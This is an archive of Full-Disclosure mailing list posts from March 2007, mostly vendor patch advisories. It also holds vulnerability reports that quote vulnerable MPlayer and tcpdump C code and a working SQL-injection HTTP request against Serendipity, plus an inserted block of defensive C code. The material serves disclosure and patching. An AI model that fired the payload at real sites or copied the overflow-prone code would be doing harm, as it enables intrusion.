From security at mandriva.com Thu Mar 1 01:39:14 2007
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 28 Feb 2007 18:39:14 -0700
Subject: [Full-disclosure] [ MDKSA-2007:051 ] - Updated snort packages fix DoS vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:051
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : snort
 Date    : February 28, 2007
 Affected: 2006.0, 2007.0, Corporate 4.0, Multi Network Firewall 2.0
_______________________________________________________________________

 Problem Description:

 Algorithmic complexity vulnerability in Snort before 2.6.1, during
 predicate evaluation in rule matching for certain rules, allows remote
 attackers to cause a denial of service (CPU consumption and detection
 outage) via crafted network traffic, aka a backtracking attack.

 Updated packages have been patched to address this issue.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6931
_______________________________________________________________________

 Updated Packages:
_______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
_______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF5gMMmqjQ0CJFipgRAvvdAKDx62tqnBrWO/W1lxil2ia31zt5RgCePbr0
n1JAWq7D0mAn0SuTFRfLjgI=
=nDNz
-----END PGP SIGNATURE-----

From matthew.flaschen at gatech.edu Thu Mar 1 08:09:18 2007
From: matthew.flaschen at gatech.edu (Matthew Flaschen)
Date: Thu, 01 Mar 2007 03:09:18 -0500
Subject: [Full-disclosure] Stealing Browser History Without Using JavaScript
In-Reply-To:
References: <6905b1570702280843h2d29b8ddl5b5efe065b62a8a2@mail.gmail.com>
Message-ID: <45E68A2E.7030309@gatech.edu>

RSnake wrote:
> In case anyone is interested, I was able to port the old CSS
> history hacking stuff that Jeremiah Grossman originally found to a
> version that does not require JavaScript to fire using images and
> conditional logic built into CSS using a:visited and display attributes.
> It works in both IE7.0 and Firefox 2.0.0.2. Details at the link below:
>
> http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/

"We all know there are still people out there who think turning off
JavaScript protects them from everything."

Damn it... Good job. I guess NoScript isn't good enough anymore...

Matt Flaschen

From martin.pitt at canonical.com Thu Mar 1 08:59:26 2007
From: martin.pitt at canonical.com (Martin Pitt)
Date: Thu, 1 Mar 2007 09:59:26 +0100
Subject: [Full-disclosure] [USN-416-2] nvidia-glx-config regression
Message-ID: <20070301085926.GF5529@piware.de>

===========================================================
Ubuntu Security Notice USN-416-2             March 01, 2007
linux-restricted-modules-2.6.17 regression
https://launchpad.net/bugs/66908
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.10:
  nvidia-glx                               2.6.17.7-11.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-416-1 fixed various vulnerabilities in the Linux kernel.
Unfortunately that update caused the 'nvidia-glx-config' script to not
work any more. The new version fixes the problem.

We apologize for the inconvenience.
Updated packages for Ubuntu 6.10:
From moritz at jodeit.org Thu Mar 1 12:08:45 2007
From: moritz at jodeit.org (Moritz Jodeit)
Date: Thu, 1 Mar 2007 13:08:45 +0100
Subject: [Full-disclosure] MPlayer DMO buffer overflow
Message-ID: <20070301120845.GA16@fugu1.local>

There's an exploitable buffer overflow in the current version of
MPlayer (v1.0rc1) which can be exploited with a maliciously crafted
video file. It's hidden in the function DMO_VideoDecoder() in the file
loader/dmo/DMO_VideoDecoder.c. The variable format->biSize gets its
value directly from the video file, and thus can have any value up to
LONG_MAX. In line 136 it is used without any further checks as the
length argument to the memcpy() call, which can overflow the
this->m_sVhdr->bmiHeader buffer with data directly from the video file.

117     unsigned int bihs;
118
119     bihs = (format->biSize < (int) sizeof(BITMAPINFOHEADER)) ?
120             sizeof(BITMAPINFOHEADER) : format->biSize;
121
122     this->iv.m_bh = malloc(bihs);
123     memcpy(this->iv.m_bh, format, bihs);
124
125     this->iv.m_State = STOP;
126     //this->iv.m_pFrame = 0;
127     this->iv.m_Mode = DIRECT;
128     this->iv.m_iDecpos = 0;
129     this->iv.m_iPlaypos = -1;
130     this->iv.m_fQuality = 0.0f;
131     this->iv.m_bCapable16b = true;
132
133     bihs += sizeof(VIDEOINFOHEADER) - sizeof(BITMAPINFOHEADER);
134     this->m_sVhdr = malloc(bihs);
135     memset(this->m_sVhdr, 0, bihs);
136     memcpy(&this->m_sVhdr->bmiHeader, this->iv.m_bh, this->iv.m_bh->biSize);

This got fixed [1] in trunk two weeks ago.

[1] http://svn.mplayerhq.hu/mplayer/trunk/loader/dmo/DMO_VideoDecoder.c?r1=22019&r2=22204

Best,
Moritz Jodeit

From moritz at jodeit.org Thu Mar 1 12:59:23 2007
From: moritz at jodeit.org (Moritz Jodeit)
Date: Thu, 1 Mar 2007 13:59:23 +0100
Subject: [Full-disclosure] tcpdump: off-by-one heap overflow in 802.11 printer
Message-ID: <20070301125923.GA10682@fugu1.local>

There's an off-by-one heap-overflow in the ieee802.11 printer, which
can be triggered by a maliciously crafted 802.11 frame. The link type
must have been explicitly specified for this to work. The function
parse_elements() in print-802_11.c checks the length pbody->tim.length
from the frame for too small values in line 265, but then uses the
wrong variable in the following range check in line 267. Since
pbody->tim.length is defined as a u_int8_t it can hold a maximum value
of 255, which in turn would copy 252 bytes into pbody->tim.bitmap,
which is only 251 bytes of size.
253             case E_TIM:
254                     /* Present, possibly truncated */
255                     pbody->tim_status = TRUNCATED;
256                     if (!TTEST2(*(p + offset), 2))
257                             return;
258                     memcpy(&pbody->tim, p + offset, 2);
259                     offset += 2;
260                     if (!TTEST2(*(p + offset), 3))
261                             return;
262                     memcpy(&pbody->tim.count, p + offset, 3);
263                     offset += 3;
264
265                     if (pbody->tim.length <= 3)
266                             break;
267                     if (pbody->rates.length > sizeof pbody->tim.bitmap)
268                             return;
269                     if (!TTEST2(*(p + offset), pbody->tim.length - 3))
270                             return;
271                     memcpy(pbody->tim.bitmap, p + (pbody->tim.length - 3),
272                             (pbody->tim.length - 3))

The current tcpdump release 3.9.5 is still vulnerable. This got fixed
[1] in CVS Head and in the tcpdump_3_9 branch.

[1] http://cvs.tcpdump.org/cgi-bin/cvsweb/tcpdump/print-802_11.c?r1=1.42&r2=1.43

Best,
Moritz Jodeit

From samuschie at yahoo.de Thu Mar 1 16:55:13 2007
From: samuschie at yahoo.de (SaMuschie)
Date: Thu, 1 Mar 2007 17:55:13 +0100 (CET)
Subject: [Full-disclosure] Serendipity unauthenticated SQL-Injection
Message-ID: <20070301165513.66851.qmail@web27807.mail.ukl.yahoo.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+--------------------------------------- - -- -
| SaMuschie Research Labs proudly presents . . .
+------------------------------------------- -- - -
| Application: serendipity
| Version: 1.1.1 (others not tested)
| Vuln./Exploit Type: SQL-Injection
| Status: 0day
+----------------------------------------- -- - -
| Discovered by: Samenspender
| Released: 20070301
| SaMuschie Release Number: 4
+------------------------------- - -- -

POST /serendipity/index.php?frontpage HTTP/1.0
User-Agent: Mozilla/5.0 (SaMuschie)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Connection: close

serendipity%5BmultiCat%5D%5B%5D='&serendipity%5BisMultiCat%5D=Go%21

+----------------------------- -- -
| Lameness Disclaimer
+------------------------------------- - -- - -
| SaMuschie Research Labs was found to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
|
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of
| this advisory are requested not to ask any questions
| to the researchers.... they don't know the answer ;)
+---------------------------------- - -- - -

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF5tLFMFgfGpQK8VERAgphAJ4qvuCfLYTWO6pluhlm92gSlZz5AQCeINsc
rYF05IF5Rztw2+FzaqhUyA4=
=sQNU
-----END PGP SIGNATURE-----
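The MPlayer and tcpdump reports above both come down to a length read from untrusted input (format->biSize in one case, pbody->tim.length in the other) reaching memcpy() without being checked against the destination it fills and against the bytes actually present. The block below is an added example, not code from either project; the names tim_element, parse_tim, bmp_header and copy_self_sized_header, and the 64 KiB header bound, are hypothetical stand-ins.

```c
/* Added example, not MPlayer or tcpdump code: the defensive form of the two
 * copies discussed in the reports above. All struct/function names are
 * hypothetical stand-ins. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define TIM_BITMAP_MAX 251          /* same destination size as in the report */

/* Stand-in for the TIM element: a one-byte length taken from the frame, three
 * fixed bytes, then a partial virtual bitmap of at most 251 bytes. */
struct tim_element {
    uint8_t length;                 /* untrusted: read from the frame */
    uint8_t count;
    uint8_t period;
    uint8_t bitmap_control;
    uint8_t bitmap[TIM_BITMAP_MAX];
    size_t  bitmap_len;             /* number of bitmap bytes actually copied */
};

enum parse_status { PARSE_OK = 0, PARSE_TRUNCATED = 1, PARSE_TOO_LONG = 2 };

/* Parse a TIM element body. p points at the length byte and avail is the
 * number of bytes readable from p. The fixed part after the length byte
 * (count, period, bitmap_control) is 3 bytes; the rest is the bitmap. */
enum parse_status parse_tim(const uint8_t *p, size_t avail, struct tim_element *out)
{
    if (avail < 1)
        return PARSE_TRUNCATED;
    out->length = p[0];
    if (out->length < 3)                    /* not even the fixed part */
        return PARSE_TRUNCATED;
    if ((size_t)1 + out->length > avail)    /* claims more than the frame holds */
        return PARSE_TRUNCATED;

    size_t bitmap_len = out->length - 3;
    /* The check the report calls out: compare the TIM length, not some other
     * element's length, against the TIM bitmap. A length of 255 gives
     * 252 > 251 and is rejected here instead of overflowing. */
    if (bitmap_len > sizeof out->bitmap)
        return PARSE_TOO_LONG;

    out->count = p[1];
    out->period = p[2];
    out->bitmap_control = p[3];
    memcpy(out->bitmap, p + 4, bitmap_len);
    out->bitmap_len = bitmap_len;
    return PARSE_OK;
}

/* Stand-in for a self-sized header such as BITMAPINFOHEADER: the first field
 * is the size the file claims the header has. */
struct bmp_header {
    uint32_t bi_size;
    uint32_t bi_width;
    uint32_t bi_height;
};

#define BMP_HEADER_MAX (64u * 1024u)  /* assumed sane bound for extended headers */

/* Return a heap copy of exactly the validated header size, or NULL when the
 * claimed size is implausible or larger than the input (caller frees it).
 * bi_size is handled as unsigned throughout, so a value that would be
 * negative as a signed LONG cannot slip under a "< sizeof" comparison. */
unsigned char *copy_self_sized_header(const unsigned char *in, size_t in_len,
                                      size_t *out_len)
{
    uint32_t claimed;
    if (in_len < sizeof(struct bmp_header))
        return NULL;
    memcpy(&claimed, in, sizeof claimed);   /* size field, host byte order here */
    if (claimed < sizeof(struct bmp_header) || claimed > BMP_HEADER_MAX)
        return NULL;
    if (claimed > in_len)                   /* would read past the file data */
        return NULL;
    unsigned char *copy = malloc(claimed);
    if (copy == NULL)
        return NULL;
    memcpy(copy, in, claimed);
    *out_len = claimed;
    return copy;
}
```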
From prb at lava.net Thu Mar 1 19:06:48 2007
From: prb at lava.net (Peter Besenbruch)
Date: Thu, 01 Mar 2007 09:06:48 -1000
Subject: [Full-disclosure] Stealing Browser History Without Using JavaScript
In-Reply-To: <45E68A2E.7030309@gatech.edu>
References: <6905b1570702280843h2d29b8ddl5b5efe065b62a8a2@mail.gmail.com> <45E68A2E.7030309@gatech.edu>
Message-ID: <45E72448.2030706@lava.net>

Matthew Flaschen wrote:
> "We all know there are still people out there who think turning off
> JavaScript protects them from everything."

It protects from an awful lot, and so far, from the worst stuff.

> Damn it... Good job. I guess NoScript isn't good enough anymore...

I couldn't get the demo to work over here, because of the Safe History
extension. For reference, I'll put out the links for Safe History, Safe
Cache, and Noscript:

https://addons.mozilla.org/firefox/1502/
https://addons.mozilla.org/firefox/1474/
https://addons.mozilla.org/firefox/722/

And I agree with you, RSnake did well.
--
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

From don.bailey at gmail.com Thu Mar 1 21:58:56 2007
From: don.bailey at gmail.com (don bailey)
Date: Thu, 01 Mar 2007 14:58:56 -0700
Subject: [Full-disclosure] Angel LMS 7.1 - Remote SQL Injection
In-Reply-To: <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com>
References: <20070301160606.20961.qmail@securityfocus.com> <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com>
Message-ID: <45E74CA0.1060207@gmail.com>

Oops, sorry for the cross post. Wasn't paying attention to the folder.
From research at matousec.com Thu Mar 1 10:40:40 2007
From: research at matousec.com (Matousec - Transparent security Research)
Date: Thu, 01 Mar 2007 11:40:40 +0100
Subject: [Full-disclosure] Comodo Bypassing settings protection using magic pipe Vulnerability
Message-ID: <45E6ADA8.50407@matousec.com>

Hello,

We would like to inform you about a vulnerability in Comodo Firewall Pro.

Description:

Comodo Firewall Pro (former Comodo Personal Firewall) stores some of its
internal settings in the registry key
HKLM\SYSTEM\Software\Comodo\Personal Firewall. This key is protected by
Comodo drivers such that other applications are not able to change the
settings. This protection can be bypassed if very special conditions are
met. CFP internally uses a named pipe whose name varies, but can always
be determined. A process that opens this pipe many times is able to
manipulate the protected settings of CFP. A proper modification of the
settings will disable all protection mechanisms implemented by CFP after
a reboot.
Vulnerable software:

 * Comodo Firewall Pro 2.4.18.184
 * Comodo Firewall Pro 2.4.17.183
 * Comodo Firewall Pro 2.4.16.174
 * Comodo Personal Firewall 2.3.6.81
 * probably all older versions of Comodo Personal Firewall 2
 * possibly older versions of Comodo Personal Firewall

More details and a proof of concept including its source code are
available here:

http://www.matousec.com/info/advisories/Comodo-Bypassing-settings-protection-using-magic-pipe.php

Regards,

--
Matousec - Transparent security Research
http://www.matousec.com/

From don.bailey at gmail.com Thu Mar 1 21:52:20 2007
From: don.bailey at gmail.com (don bailey)
Date: Thu, 01 Mar 2007 14:52:20 -0700
Subject: [Full-disclosure] Angel LMS 7.1 - Remote SQL Injection
In-Reply-To: <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com>
References: <20070301160606.20961.qmail@securityfocus.com> <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com>
Message-ID: <45E74B14.3070406@gmail.com>

> http://www.milw0rm.com/exploits/3390
>
> Plagiarism sucks.

So does altering source code before you post it on your website.

http://kernelspace.us/itheft.c
http://www.milw0rm.com/exploits/3383

From falco at gentoo.org Fri Mar 2 00:35:08 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Fri, 2 Mar 2007 01:35:08 +0100
Subject: [Full-disclosure] [ GLSA 200703-03 ] ClamAV: Denial of Service
Message-ID: <20070302003508.GJ14157@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                            Gentoo Linux Security Advisory           GLSA 200703-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: ClamAV: Denial of Service
      Date: March 02, 2007
      Bugs: #167201
        ID: 200703-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

ClamAV contains two vulnerabilities allowing a Denial of Service.
Background
==========

ClamAV is a GPL virus scanner.

Affected packages
=================

    -------------------------------------------------------------------
     Package                   /  Vulnerable  /              Unaffected
    -------------------------------------------------------------------
  1  app-antivirus/clamav            < 0.90                    >= 0.90

Description
===========

An anonymous researcher discovered a file descriptor leak error in the
processing of CAB archives and a lack of validation of the "id"
parameter string used to create local files when parsing MIME headers.

Impact
======

A remote attacker can send several crafted CAB archives with a
zero-length record header that will fill the available file descriptors
until no other is available, which will prevent ClamAV from scanning
most archives. An attacker can also send an email with specially crafted
MIME headers to overwrite local files with the permissions of the user
running ClamAV, such as the virus database file, which could prevent
ClamAV from detecting any virus.

Workaround
==========

The first vulnerability can be prevented by refusing any file of type
CAB, but there is no known workaround for the second issue.

Resolution
==========

All ClamAV users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.90"

References
==========

  [ 1 ] CVE-2007-0897
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897
  [ 2 ] CVE-2007-0898
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0898

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/22894e74/attachment.bin From falco at gentoo.org Fri Mar 2 00:33:29 2007 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 2 Mar 2007 01:33:29 +0100 Subject: [Full-disclosure] [ GLSA 200703-02 ] SpamAssassin: Long URI Denial of Service Message-ID: <20070302003329.GH14157@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: SpamAssassin: Long URI Denial of Service Date: March 02, 2007 Bugs: #166969 ID: 200703-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== SpamAssassin is vulnerable to a Denial of Service attack. Background ========== SpamAssassin is an extensible email filter used to identify junk email. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 mail-filter/spamassassin < 3.1.8 >= 3.1.8 Description =========== SpamAssassin does not correctly handle very long URIs when scanning emails. Impact ====== An attacker could cause SpamAssassin to consume large amounts of CPU and memory resources by sending one or more emails containing very long URIs. 
Workaround ========== There is no known workaround at this time. Resolution ========== All SpamAssassin users should upgrade to the latest version. # emerge --sync # emerge --ask --oneshot --verbose ">=mail-filter/spamassassin-3.1.8" References ========== [ 1 ] CVE-2007-0451 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0451 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/d006245d/attachment.bin From falco at gentoo.org Fri Mar 2 00:31:56 2007 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 2 Mar 2007 01:31:56 +0100 Subject: [Full-disclosure] [ GLSA 200703-01 ] Snort: Remote execution of arbitrary code Message-ID: <20070302003156.GF14157@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Snort: Remote execution of arbitrary code Date: February 23, 2007 Bugs: #167730 ID: 200703-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== The Snort DCE/RPC preprocessor contains a buffer overflow that could result in the remote execution of arbitrary code. Background ========== Snort is a widely deployed intrusion detection program. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-analyzer/snort < 2.6.1.3 >= 2.6.1.3 Description =========== The Snort DCE/RPC preprocessor does not properly reassemble certain types of fragmented SMB and DCE/RPC packets. Impact ====== A remote attacker could send specially crafted fragmented SMB or DCE/RPC packets, without the need to finish the TCP handshake, that would trigger a stack-based buffer overflow while being reassembled. This could lead to the execution of arbitrary code with the permissions of the user running the Snort preprocessor. 
Workaround ========== Disable the DCE/RPC processor by commenting 'preprocessor rpc_decode' and 'include $RULE_PATH/rpc.rules' from /etc/snort/snort.conf . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/fe507690/attachment.bin From str0ke at milw0rm.com Fri Mar 2 03:34:23 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 1 Mar 2007 21:34:23 -0600 Subject: [Full-disclosure] Angel LMS 7.1 - Remote SQL Injection In-Reply-To: <45E74B14.3070406@gmail.com> References: <20070301160606.20961.qmail@securityfocus.com> <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com> <45E74B14.3070406@gmail.com> Message-ID: <814b9d50703011934n78768de6v240af05470da03f@mail.gmail.com> Thank you for the info, code has been updated. /str0ke On 3/1/07, don bailey wrote: > > > http://www.milw0rm.com/exploits/3390 > > > > Plagiarism sucks. 
> > So does altering source code before you post it on your website. > > http://kernelspace.us/itheft.c > http://www.milw0rm.com/exploits/3383 > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From kees at ubuntu.com Fri Mar 2 05:42:16 2007 From: kees at ubuntu.com (Kees Cook) Date: Thu, 1 Mar 2007 21:42:16 -0800 Subject: [Full-disclosure] [USN-428-2] Firefox regression Message-ID: <20070302054216.GX27137@outflux.net> =========================================================== Ubuntu Security Notice USN-428-2 March 02, 2007 firefox regression https://launchpad.net/bugs/88990 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: firefox 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2 libnspr4 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2 libnss3 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: USN-428-1 fixed vulnerabilities in Firefox 1.5. However, changes to library paths caused applications depending on libnss3 to fail to start up. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Several flaws have been found that could be used to perform Cross-site scripting attacks. A malicious web site could exploit these to modify the contents or steal confidential data (such as passwords) from other opened web pages. 
(CVE-2006-6077, CVE-2007-0780, CVE-2007-0800, CVE-2007-0981, CVE-2007-0995, CVE-2007-0996) The SSLv2 protocol support in the NSS library did not sufficiently check the validity of public keys presented with a SSL certificate. A malicious SSL web site using SSLv2 could potentially exploit this to execute arbitrary code with the user's privileges. (CVE-2007-0008) The SSLv2 protocol support in the NSS library did not sufficiently verify the validity of client master keys presented in an SSL client certificate. A remote attacker could exploit this to execute arbitrary code in a server application that uses the NSS library. (CVE-2007-0009) Various flaws have been reported that could allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious web page. (CVE-2007-0775, CVE-2007-0776, CVE-2007-0777, CVE-2007-1092) Two web pages could collide in the disk cache with the result that depending on order loaded the end of the longer document could be appended to the shorter when the shorter one was reloaded from the cache. It is possible a determined hacker could construct a targeted attack to steal some sensitive data from a particular web page. The potential victim would have to be already logged into the targeted service (or be fooled into doing so) and then visit the malicious site. (CVE-2007-0778) David Eckel reported that browser UI elements--such as the host name and security indicators--could be spoofed by using custom cursor images and a specially crafted style sheet. 
(CVE-2007-0779) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2.diff.gz Size/MD5: 177681 367677dfb9fcdea096afe508f510507a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2.dsc Size/MD5: 1120 e96bcad4e4a2fdff5e90047442a854e3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10.orig.tar.gz Size/MD5: 44679183 d55d439c238064ddcedb8fabb6089ff2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_all.deb Size/MD5: 50480 0a9654e29b1e7b315fe7bcde85fe0a82 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_all.deb Size/MD5: 51368 f7d7e7df86459c24fa3184da5e723ca3 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 47443244 3322fcd458dbfe789ae53e21b86df8be http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 2804584 ee33eecb089c532d74c33e544cd5b520 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 217432 4ecfe5ce1cd0d9164a2efbb99196f813 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 83680 7b22ca5bf3a188e54c2f4d3270cbd0d3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 9439946 eb8e96f2526f59a96713b4d80653062c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 220236 b0ce1880afb5c1ee300a1e5c6bbf897c 
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 163584 9cce73f59d74b1a6921ef8004f02cda2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 245562 3681ed65b9380ece582bdcceb2379d8c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_amd64.deb Size/MD5: 823220 54fd6d513754541a455041537876bad8 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 44006406 98c9c7360e6aaa7eea4ed2c41f273aae http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 2804456 b2ddd97204d33fdc5b29971e9aa41630 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 210834 6a1438cbef0a71363d360777bbd3214c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 76068 e757d313cda5de879e948b42006bcdeb http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 7948176 735483f66d8c09cdbed8833073456681 